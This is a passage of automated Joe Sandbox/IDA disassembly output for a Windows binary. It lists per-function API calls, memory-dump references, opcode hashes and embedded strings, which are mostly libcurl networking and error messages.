                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000D2254,?,?,?,000C8B8E), ref: 000E1D28
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8B8E), ref: 000E1D45
                                          • Part of subcall function 000E1AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,74F81980,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1AF5
                                          • Part of subcall function 000E1AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1B03
                                          • Part of subcall function 000E1AEE: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,000E1D52,?,?,?,?,000C8B8E), ref: 000E1B11
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,000C8B8E), ref: 000E1DAC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8B8E), ref: 000E1DCC
                                          • Part of subcall function 000E7F41: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E8006
                                          • Part of subcall function 000E7F41: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E8023
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$__acrt_iob_func$calloc
                                        • String ID:
                                        • API String ID: 3275786289-0
                                        • Opcode ID: e244ab542f179d4f575e8dc886d6a82bbc16790aca0decae0fac11c3e2abea75
                                        • Instruction ID: ce7e3000b1ea2ce521bc0a179a82677bf269828b47fe242e0b90c7d95b7e5bb5
                                        • Opcode Fuzzy Hash: e244ab542f179d4f575e8dc886d6a82bbc16790aca0decae0fac11c3e2abea75
                                        • Instruction Fuzzy Hash: 22219331744616EFDB189F25EC056EDBBF5FB84360F20812AE429E72D1DBB028518B95
                                        APIs
                                        • getaddrinfo.WS2_32(?,?,?,?), ref: 000FFEC0
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 000FFF44
                                        • freeaddrinfo.WS2_32(00000000,?,?), ref: 000FFFCE
                                        • WSASetLastError.WS2_32(00002AF9,?,?), ref: 000FFFF2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLastfreeaddrinfogetaddrinfomalloc
                                        • String ID:
                                        • API String ID: 2354400463-0
                                        • Opcode ID: 9cbf01977ddc7689c7d8cfd570b9cb9f483f0d2197a0b611152d5551a33843ce
                                        • Instruction ID: c94e45e722638aae71ef2113334bdd5893355c45b7c4508eb43aa007f9b154e1
                                        • Opcode Fuzzy Hash: 9cbf01977ddc7689c7d8cfd570b9cb9f483f0d2197a0b611152d5551a33843ce
                                        • Instruction Fuzzy Hash: B4417B72A0060BEBCB24CFA4D480ABAB7F5BF45714F10853EE64597A51D770A948DB90
                                        APIs
                                          • Part of subcall function 000C32D3: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008), ref: 000C32F6
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000CCF70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: callocmalloc
                                        • String ID: hnd = curl_easy_init();$out of memory$Q
                                        • API String ID: 1635859522-3006749264
                                        • Opcode ID: 30d305c97f0e791f2975f467f48fd614765b46772b714448bd560a38b4666209
                                        • Instruction ID: ff852f0cdcc0ff6708b01f8f314830721849dd3e4c4eae30546a1ad11ff44747
                                        • Opcode Fuzzy Hash: 30d305c97f0e791f2975f467f48fd614765b46772b714448bd560a38b4666209
                                        • Instruction Fuzzy Hash: 5521C771B0431067DB24AB75984AFEE7B95AF40760F14403EF90AA7387DA70AD468691
                                        APIs
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,Failed to create/open output), ref: 000C909C
                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 000C90D7
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00117668,?), ref: 000C90E8
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 000C9107
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fputs$fwrite
                                        • String ID:
                                        • API String ID: 2206100360-0
                                        • Opcode ID: 2ee36c61188540d6a8f5c20686a2b5a198ac53cf995b2908a1fd1cb376bfe8f9
                                        • Instruction ID: f021862e3d3f973101d4fd87749fb330113776d57bc30f18089a4b08cbf2633a
                                        • Opcode Fuzzy Hash: 2ee36c61188540d6a8f5c20686a2b5a198ac53cf995b2908a1fd1cb376bfe8f9
                                        • Instruction Fuzzy Hash: 5131E536904206EFCB148FA8D989EECFBF1EF84340B2481A9EC5593655DB72AD45CB90
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000DF255
                                          • Part of subcall function 000D941D: __alldvrm.LIBCMT ref: 000D9466
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000DF287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm
                                        • String ID: Connection time-out
                                        • API String ID: 67483490-165637984
                                        • Opcode ID: a6e2ad5fc3041275adcd7c5e622709815823d0beb90a0c59355f7fe0c3ceaae8
                                        • Instruction ID: b0c3ee85130c7d9a12ab2a47f0c203e1d567153117062f5d09a87c4d9f503d2b
                                        • Opcode Fuzzy Hash: a6e2ad5fc3041275adcd7c5e622709815823d0beb90a0c59355f7fe0c3ceaae8
                                        • Instruction Fuzzy Hash: 21517371B04706AFEB18DF69D845ABEB7E5EF84710F10813BE516DB381DB70A9418B90
                                        Strings
                                        • select/poll on SSL/TLS socket, errno: %d, xrefs: 001057B9
                                        • SSL/TLS connection timeout, xrefs: 001057CB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                        • API String ID: 0-3791222319
                                        • Opcode ID: ca9f156387625bbad795f1fafd8167a5743f033f6e9042586459f9e2f0a69df3
                                        • Instruction ID: 59bb32a1e25d0d3e79f952d775f42ec21790ffd5b3ce2366ed8598649f1f5b41
                                        • Opcode Fuzzy Hash: ca9f156387625bbad795f1fafd8167a5743f033f6e9042586459f9e2f0a69df3
                                        • Instruction Fuzzy Hash: 8D510D75200B46DBDB29DE2888956BB77E7AF85320FA0491DF8C6C72D1DBB0D8408F51
                                        APIs
                                          • Part of subcall function 000DD482: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DD52F
                                        • send.WS2_32(?,?,?,00000000), ref: 000DD80F
                                        • WSAGetLastError.WS2_32 ref: 000DD81F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLastmallocsend
                                        • String ID: Send failure: %s
                                        • API String ID: 1822245873-857917747
                                        • Opcode ID: d78dd6d3f110c6e01b9916230462801e0ed8a21df54710c68529a3d6c91a3fe3
                                        • Instruction ID: ca2d0e3a079c7bf6533394c412fe0a701eabe49f57561a56768ec7682ac5594f
                                        • Opcode Fuzzy Hash: d78dd6d3f110c6e01b9916230462801e0ed8a21df54710c68529a3d6c91a3fe3
                                        • Instruction Fuzzy Hash: B011B171A003089BC7259F68DC41ADEB7B9FF88320F10456BE515973C1DBB099818BA0
                                        APIs
                                        • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 000DED8A
                                        • WSAGetLastError.WS2_32 ref: 000DED95
                                          • Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
                                          • Part of subcall function 000DA0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
                                          • Part of subcall function 000DA0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
                                          • Part of subcall function 000DA0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
                                          • Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA142
                                          • Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA15C
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
                                          • Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
                                          • Part of subcall function 000DA0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193
                                        Strings
                                        • Could not set TCP_NODELAY: %s, xrefs: 000DEDAA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_errno$_strrchr$__sys_errlist__sys_nerrsetsockoptstrncpy
                                        • String ID: Could not set TCP_NODELAY: %s
                                        • API String ID: 2763351927-4027281243
                                        • Opcode ID: 3504fe53877e58e0148db8ccd02920df645341205a05e1a49e7a86447bde352a
                                        • Instruction ID: 044ea791a807b744466b2bdbc54e284475accdbf824e7f95a16b843da04c7555
                                        • Opcode Fuzzy Hash: 3504fe53877e58e0148db8ccd02920df645341205a05e1a49e7a86447bde352a
                                        • Instruction Fuzzy Hash: B2F09670A00314ABDB28AB60DC06EEE77A9DF59300F4041BEF44596281EAB49A854E95
                                        APIs
                                        • SleepEx.KERNELBASE(00000000,00000000), ref: 000DE28C
                                        • getsockopt.WS2_32(?,0000FFFF,00001007,?,00000004), ref: 000DE2A5
                                        • WSAGetLastError.WS2_32(?,0000FFFF,00001007,?,00000004), ref: 000DE2AF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLastSleepgetsockopt
                                        • String ID:
                                        • API String ID: 3033474312-0
                                        • Opcode ID: c14bd7672ed2b9f6b57282357511a7f04109cb64df4cb9151dfcedb85eee3186
                                        • Instruction ID: 35416665e83b946e237cabcb1ac1f361432c1a9ee6f2cfe5d5d6875c30388f61
                                        • Opcode Fuzzy Hash: c14bd7672ed2b9f6b57282357511a7f04109cb64df4cb9151dfcedb85eee3186
                                        • Instruction Fuzzy Hash: DBF06DB1600749EEE7249BD6CD84AFEBBEDEB4A314F20416AF505D6380E6709D449670
                                        APIs
                                          • Part of subcall function 000EF90F: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EF962
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D86E0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D8712
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D875C
                                          • Part of subcall function 000D941D: __alldvrm.LIBCMT ref: 000D9466
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$Unothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 256925405-0
                                        • Opcode ID: 0831f31e4308e7b9a60e54b69b80bee4a251835ba62f723af0c146f751efd1e4
                                        • Instruction ID: 4e46bc8b8fc60189ba55fd222c546680a22678be56f1f2a002c207573a1d9a94
                                        • Opcode Fuzzy Hash: 0831f31e4308e7b9a60e54b69b80bee4a251835ba62f723af0c146f751efd1e4
                                        • Instruction Fuzzy Hash: 85D18031E043459BDF14DF5898856EEB7F2AF85320F28816BE845BF386DE719C458BA0
                                        Strings
                                        • operation aborted by pre-request callback, xrefs: 000D80B5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: operation aborted by pre-request callback
                                        • API String ID: 1294909896-1824986975
                                        • Opcode ID: c2dfc67bac3787b271bc107a6b67665b5887c09acee757960ecb77ccb7f94f1f
                                        • Instruction ID: 7cdca089539c428ed9815d549b35cc1b5ff23527bb4b9fb0da2994a57d591d06
                                        • Opcode Fuzzy Hash: c2dfc67bac3787b271bc107a6b67665b5887c09acee757960ecb77ccb7f94f1f
                                        • Instruction Fuzzy Hash: E691D131A043459BDF249F68D8957EEBBE6AF84310F28817BD805AB3C2DE754C468B61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: no transfer performed
                                        • API String ID: 0-1612002148
                                        • Opcode ID: f9eadf65836aece0d3249b9edffc1863de4b16a4a14332c98ffddf82a1806cc0
                                        • Instruction ID: 3e04d786ef82f0d442299f4a09e102ca87c770d218477f6f9d2e6c3d51bde664
                                        • Opcode Fuzzy Hash: f9eadf65836aece0d3249b9edffc1863de4b16a4a14332c98ffddf82a1806cc0
                                        • Instruction Fuzzy Hash: D4312572D0064A6BEB65DBF8D48AFAD77F0AB44310F1802ADD80AA725ADF31DD058380
                                        APIs
                                        • socket.WS2_32(?,?,?), ref: 000DF530
                                        • ioctlsocket.WS2_32(?,8004667E,?), ref: 000DF566
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ioctlsocketsocket
                                        • String ID:
                                        • API String ID: 416004797-0
                                        • Opcode ID: 5aec247e622c640974456bcf968b03351a9ccdde4effa4ec1b168b0d5d29c992
                                        • Instruction ID: 625e3410c308ebd0d2054f2514730270dbc0dfb3de58dba7d702a784e536687d
                                        • Opcode Fuzzy Hash: 5aec247e622c640974456bcf968b03351a9ccdde4effa4ec1b168b0d5d29c992
                                        • Instruction Fuzzy Hash: A7316931A00616EFDB28CF24D884BAAB7F2FF48314F1085AAE41A97251D731A984CF60
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DD52F
                                        • recv.WS2_32(?,?,?,00000000), ref: 000DD56C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: mallocrecv
                                        • String ID:
                                        • API String ID: 410377367-0
                                        • Opcode ID: 8c14be21d1ca3775a7df7da54f56535f2915ac9fd58d4ba4bb9c70e01bd6d543
                                        • Instruction ID: 0cd745e8fe2779df56ec12f4dfdbbcd4d9bfa68b1633061c3c265e80e427e4ee
                                        • Opcode Fuzzy Hash: 8c14be21d1ca3775a7df7da54f56535f2915ac9fd58d4ba4bb9c70e01bd6d543
                                        • Instruction Fuzzy Hash: 1C318071A05B06ABDB569E2CE8857F5B3E4FB44339F74472BA858C33A4D720A824C690
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1E6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Closing connection %ld
                                        • API String ID: 1294909896-1512264877
                                        • Opcode ID: b2f53e907b18a755154d010bd44185ee31e6ed43cbeb841d8f161715889d264b
                                        • Instruction ID: 70dc09493b319bff0517fbc1fa4383de98404632e8edbbb04a2d82e46b4ddf70
                                        • Opcode Fuzzy Hash: b2f53e907b18a755154d010bd44185ee31e6ed43cbeb841d8f161715889d264b
                                        • Instruction Fuzzy Hash: 852184317006019FD7589A2D9C85BEAF3DAAF84750F24403AF819DB3A6CF74AC518690
                                        APIs
                                        • WSACloseEvent.WS2_32(?), ref: 000D8BC2
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D8BD7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CloseEventfree
                                        • String ID:
                                        • API String ID: 126896923-0
                                        • Opcode ID: e0fad381e6b6ff65fa6ef3238a8bedb7ba3b3ad03ca609ee9e9359fce100dfb0
                                        • Instruction ID: a975fe5f4efff8be2e44093487cdc5dd5f322a32f6e235abb21d76bfbe65fc8f
                                        • Opcode Fuzzy Hash: e0fad381e6b6ff65fa6ef3238a8bedb7ba3b3ad03ca609ee9e9359fce100dfb0
                                        • Instruction Fuzzy Hash: CC21C272600B51DFD729EB21C8547AAB3E1FF90732F14C82BD44262692CF74A845CBE1
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E8C01,?,?,00000000), ref: 000E8928
                                        • InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,000E8C01,?,?,00000000), ref: 000E8936
                                          • Part of subcall function 0010699F: socket.WS2_32(00000002,00000001,00000006), ref: 001069C9
                                          • Part of subcall function 0010699F: htonl.WS2_32(7F000001), ref: 001069F0
                                          • Part of subcall function 0010699F: setsockopt.WS2_32(00000000,0000FFFF,00000004,?,00000004), ref: 00106A12
                                          • Part of subcall function 0010699F: bind.WS2_32(00000000,?,00000010), ref: 00106A27
                                          • Part of subcall function 0010699F: getsockname.WS2_32(00000000,?,00000010), ref: 00106A3E
                                          • Part of subcall function 0010699F: listen.WS2_32(00000000,00000001), ref: 00106A59
                                          • Part of subcall function 0010699F: socket.WS2_32(00000002,00000001,00000000), ref: 00106A6F
                                          • Part of subcall function 0010699F: connect.WS2_32(00000000,?,00000010), ref: 00106A86
                                          • Part of subcall function 0010699F: ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00106AA5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: socket$CriticalInitializeSectionbindconnectgetsocknamehtonlioctlsocketlistenmallocsetsockopt
                                        • String ID:
                                        • API String ID: 1746218282-0
                                        • Opcode ID: 0526e79d2450cd35fc52da0dce91c69f6bdb2740254bf15bda6842c73fc659b7
                                        • Instruction ID: 81314da52cacb9229991f82017acbbccc8857f751a3a13fecd50fca6225b163d
                                        • Opcode Fuzzy Hash: 0526e79d2450cd35fc52da0dce91c69f6bdb2740254bf15bda6842c73fc659b7
                                        • Instruction Fuzzy Hash: 9111E431610306AFDB149F25DC4579A3BE9EF00360F14856AF805EB1D2DBB0E9448BA0
                                        APIs
                                        • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00001000,?,00000000,00000000,00000000,?,000CDD03,?), ref: 000CE0C0
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000CE0FB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
